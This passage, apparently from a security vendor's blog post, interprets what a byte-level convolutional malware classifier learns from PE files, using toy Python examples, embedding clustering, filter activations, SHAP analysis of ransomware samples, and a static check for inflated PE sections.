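INPUT_LEN = 32   # fixed input length: longer files are truncated, shorter padded
EMBED_DIM = 8
WINDOW = 3       # width of the sliding convolution window


def prepare_input(data, length=INPUT_LEN):
    """Step (1): a fixed-length sequence of byte ids, truncating or padding."""
    ids = list(data[:length])
    return ids + [PAD] * (length - len(ids))


def make_embedding(seed=1):
    """Step (2): one EMBED_DIM vector per symbol. Constructed: random rows, except
    that PAD and 0x00 embed to the zero vector so they contribute nothing to an
    activation (an assumption of this toy, not a property of the real model)."""
    rng = random.Random(seed)
    table = [[rng.uniform(-1.0, 1.0) for _ in range(EMBED_DIM)] for _ in range(257)]
    table[PAD] = [0.0] * EMBED_DIM
    table[0x00] = [0.0] * EMBED_DIM
    return table


def matched_filter(pattern, table):
    """A filter whose weights are the embeddings of a byte pattern. A trained
    filter learns its weights; this stand-in responds most strongly to exactly
    that pattern, which keeps the example deterministic."""
    return [table[b] for b in pattern]


def conv1d(ids, table, filt):
    """Step (3): slide the window over the embedded sequence; the activation at
    offset o is the dot product of window o with the filter, followed by ReLU."""
    acts = []
    for o in range(len(ids) - WINDOW + 1):
        s = sum(table[ids[o + w]][d] * filt[w][d]
                for w in range(WINDOW) for d in range(EMBED_DIM))
        acts.append(max(s, 0.0))
    return acts


def max_pool(acts):
    """Step (5): keep the strongest activation and remember which file offset
    produced it; that offset is what later lets an activation be traced to bytes."""
    best = max(range(len(acts)), key=acts.__getitem__)
    return acts[best], best


# Constructed sample: a 'push imm8; push imm8; call rel32' opcode prefix, the
# multi-push-then-call shape the post attributes to Filter 57, at file offset 10.
PUSH_PUSH_CALL = bytes([0x6A, 0x6A, 0xE8])
SAMPLE = bytes(10) + PUSH_PUSH_CALL + bytes(4)


def strongest_offset(data, pattern=PUSH_PUSH_CALL, seed=1):
    """File offset whose window most strongly activates the matched filter."""
    table = make_embedding(seed)
    acts = conv1d(prepare_input(data), table, matched_filter(pattern, table))
    _, offset = max_pool(acts)
    return offset


if __name__ == "__main__":
    print("strongest activation at file offset", strongest_offset(SAMPLE))  # 10
```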

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.

Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown on the right side of Figure 2. Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 are present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section – basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).

Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.

Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis. When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) are lost, and the classifier treats these as two completely independent features.

Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.

Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.
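A static check for one of the section-table anomalies the end-to-end analysis surfaced, added here as an example and not FireEye's code: it parses the section table of a constructed PE header image and flags sections whose VirtualSize exceeds SizeOfRawData by more than a given ratio. The 10x threshold mirrors the observation above and is an assumed cut-off, not a rule from the post.

```python
import struct
from typing import Dict, List, Tuple

# IMAGE_SECTION_HEADER (40 bytes): Name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"
SECTION_SIZE = struct.calcsize(SECTION_FMT)

def parse_sections(pe: bytes) -> List[Dict[str, object]]:
    """Follow e_lfanew to the COFF header and read every section-table entry."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size  # section table sits right after the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, raw_size, raw_ptr, *_ = struct.unpack_from(
            SECTION_FMT, pe, table + i * SECTION_SIZE)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return sections

def flag_inflated_sections(pe: bytes, ratio: float = 10.0) -> List[str]:
    """Names of sections whose VirtualSize exceeds SizeOfRawData by more than `ratio`."""
    return [s["name"] for s in parse_sections(pe)
            if s["raw_size"] > 0 and s["virtual_size"] > ratio * s["raw_size"]]

def build_sample_pe(sections: List[Tuple[bytes, int, int]]) -> bytes:
    """Constructed, non-executable PE header image: DOS stub, PE signature, COFF
    header with SizeOfOptionalHeader = 0, then the section table."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    table = b"".join(
        struct.pack(SECTION_FMT, name.ljust(8, b"\0"), vsize, 0x1000 * (i + 1),
                    raw, 0x400 * (i + 1), 0, 0, 0, 0, 0x40000040)
        for i, (name, vsize, raw) in enumerate(sections))
    return dos + b"PE\0\0" + coff + table

# Constructed sample: '.data' claims 0x50000 bytes in memory but only 0x400 on disk,
# the kind of mismatch the text reports for the WannaCry worm artifact.
SAMPLE_SECTIONS = [(b".text", 0x2000, 0x1E00), (b".data", 0x50000, 0x400),
                   (b".rsrc", 0x800, 0x800)]
print(flag_inflated_sections(build_sample_pe(SAMPLE_SECTIONS)))  # ['.data']
```

Because the parser honours SizeOfOptionalHeader from the file, the same functions work on a real executable read into memory. An inflated section is a hint to correlate with other header anomalies or an embedded payload, not proof of malice on its own.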

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.